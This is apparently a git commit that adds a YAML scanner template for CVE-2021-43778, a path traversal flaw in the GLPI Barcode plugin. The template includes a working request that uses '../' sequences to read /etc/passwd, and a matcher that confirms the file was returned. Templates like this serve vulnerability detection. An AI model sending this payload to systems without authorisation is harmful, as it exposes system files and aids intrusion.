add CVE-2021-43778.yaml

2021-12-01 15:04:29 +08:00 · 2021-12-01 15:04:29 +08:00 · 2a8ca5d836
parent fb048c7972
commit 2a8ca5d836
1 changed files with 31 additions and 0 deletions
--- a/cves/2021/CVE-2021-43778.yaml
+++ b/cves/2021/CVE-2021-43778.yaml
@ -0,0 +1,31 @@
+id: CVE-2021-43778
+
+info:
+  name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability.
+  author: cckuailong
+  severity: critical
+  description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-43778
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2021-43778
+  tags: GLPI, Barcode
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
+    headers:
+      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)
+
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        name: LFI
+        regex:
+          - "root:.*:0:0"